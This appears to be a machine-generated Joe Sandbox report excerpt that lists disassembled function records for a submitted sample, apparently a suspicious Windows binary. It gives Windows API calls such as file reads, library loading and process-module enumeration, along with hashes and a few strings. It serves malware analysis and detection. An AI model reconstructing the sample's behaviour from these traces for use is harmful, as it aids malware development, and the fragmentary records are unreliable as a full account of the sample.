                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: BINARY
                                                                                                                                                              • API String ID: 2221118986-907554435
                                                                                                                                                              • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                              • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                              • String ID: /stext
                                                                                                                                                              • API String ID: 2081463915-3817206916
                                                                                                                                                              • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                              • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2445788494-0
                                                                                                                                                              • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                              • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: malloc
                                                                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                                                                              • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                              • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                              • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                              • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmpmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1065087418-0
                                                                                                                                                              • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                              • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1381354015-0
                                                                                                                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                              • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                                                              • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                              • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                                                              • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004301AD
                                                                                                                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1297977491-0
                                                                                                                                                              • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                              • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2154303073-0
                                                                                                                                                              • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                              • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3150196962-0
                                                                                                                                                              • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                              • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$PointerRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3154509469-0
                                                                                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                              APIs
                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4232544981-0
                                                                                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$FileModuleName
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3859505661-0
                                                                                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
